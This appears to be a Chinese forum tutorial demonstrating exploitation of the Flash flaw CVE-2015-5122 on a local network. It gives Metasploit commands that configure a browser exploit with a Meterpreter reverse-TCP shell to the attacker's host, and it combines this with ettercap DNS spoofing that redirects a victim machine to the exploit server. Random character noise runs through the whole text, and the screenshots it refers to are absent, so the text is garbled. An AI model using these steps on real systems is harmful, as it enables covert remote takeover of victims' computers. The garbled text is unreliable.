. f. i2 Z- ], h 二、cve2015-5122漏洞实例演示虚拟机 ; @4 K' U! Y+ @5 g4 T
8 [) f. A. K; R9 z
: o% O5 p# D( k 关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015年flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: # `3 h1 Q( f: B) Z
' m. T( N& L: s5 O) K$ c! V# N/ a. z# ?, I. g! I
search cve-2015-5122如图: 0 V \. z7 |) O4 J7 H' ]; ~5 e. v; H
: S3 \* x# k) |7 z' k
' v. Z$ V3 `9 j: W! S" x/ Z7 f5 c ) H" ^, @: Q* J4 s4 B/ [) T) K
2 Y- V7 _) a8 z4 Q+ h. |
e3 Y# ]. I+ h1 n7 D
下面我们敲如下命令: + O N; d# {9 J+ d; z% [, l7 s
! v2 Z$ J, U2 r
' d7 u7 d: p H) k a& ] use exploit/multi/browser/adobe_flash_opaque_background_uaf
4 \, b4 s* c6 p
/ [4 q3 @) e7 k' V, L! k7 v5 v2 X5 g0 f
set PAYLOAD windows/meterpreter/reverse_tcp . I% U" b: ? B* w
9 @5 H# s2 Y0 F8 [
* n% U9 o8 q5 v$ |4 T set LHOST 192.168.0.109
+ W+ m! `* |% w$ K) @0 u 3 }, h6 Z& ~, z4 M( V
5 G1 C) m. p) j( o" J
set URIPATH / /*根目录*/ " H4 i0 n$ ^+ G8 O/ q' X2 N
( ?) f3 R, b& y
, _/ v. `* U; p3 K; m; b5 g. @# r- x set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址
9 G r0 L) y7 T5 N% \% u. o/ b
% t! ^9 z. ]0 M/ }; A# x' y/ p& Z, i/ Y
set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用
# Q$ J( ]% J$ _
0 [8 p& z" H) j: u$ A- l3 E: r: g8 e. G6 K) [
然后show options如图:
. Q; o- r; P% Y# V
+ E' Q) T* d( t% |: f
; l6 f w% X0 M4 U0 N& t2 F
5 k, s# p: l) P. n- \8 | }
+ o3 `& \% [, z, S+ k0 `& C+ |
* V# s. v8 B' Y6 K! h 一切都设置好了,执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图:
7 a( z0 h: G: W0 @* X! i+ a $ Q" W% H S0 a
" c$ X; F! T) m. X$ s8 Z, }6 |: j: ` h) A
然后ettercap -G命令打开ettercap,我们要攻击的主机ip是192.168.0。115
* z4 O3 H5 Q( q
* {! Y6 ]" f! z3 }) @6 h: T' a g, g* C8 i$ m
Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf # v& b" ^9 l% s* @( [
5 |+ P& U+ z# ~" |6 J6 t3 T' D& Q4 n# _3 J( X* d
' ^4 b% H1 \) D
" v! w: r2 o# o, a1 g3 A' [# _
( _* v9 a' E+ T4 _; Z/ P5 j
成功了,这时候我们断开ettercap,如图:
1 @0 _. K; V$ k: B5 {
* o. c5 M5 c1 i5 F4 i* |5 A, f+ U h" f$ _! m9 A8 k$ A$ Y: Y/ l$ }
$ P" f$ Z% ^- E. c9 S4 x 1 { i3 W; h- h% z9 N
/ G% V) N8 _! L3 d/ \
Screenshot如图:
4 B& k$ F$ p2 A7 Z ; q4 W7 Q/ E4 r. t2 y) w
( q- O, h }* Q5 t, q2 @ + Y) W. z' h8 y8 x- l* d ^, B
2 c( i( E5 Y% w( g4 x, W
' q# x3 z4 t' F+ P+ {* V0 V
" T8 }) D; i8 N" U' m |